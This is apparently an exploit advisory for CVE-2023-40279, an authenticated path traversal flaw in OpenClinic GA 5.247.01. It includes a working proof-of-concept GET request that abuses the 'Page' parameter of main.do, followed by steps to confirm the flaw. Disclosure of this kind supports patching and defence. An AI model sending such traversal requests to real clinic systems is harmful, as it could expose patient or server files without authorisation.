# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)# Date: 2023-08-14# Exploit Author: V. B.# Vendor Homepage: https://sourceforge.net/projects/open-clinic/# Software Link: https://sourceforge.net/projects/open-clinic/# Version: OpenClinic GA 5.247.01# Tested on: Windows 10, Windows 11# CVE: CVE-2023-40279# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.# Proof of Concept (POC)
Steps to Reproduce:- Crafting the Malicious GET Request:- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host:192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control:max-age=02. Confirming the Vulnerability:- Send the crafted GET request to the target server.- If the server responds with the content of the requested file(e.g., `main.jsp`)from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.- This vulnerability can lead to sensitive information disclosure or more severe attacks.
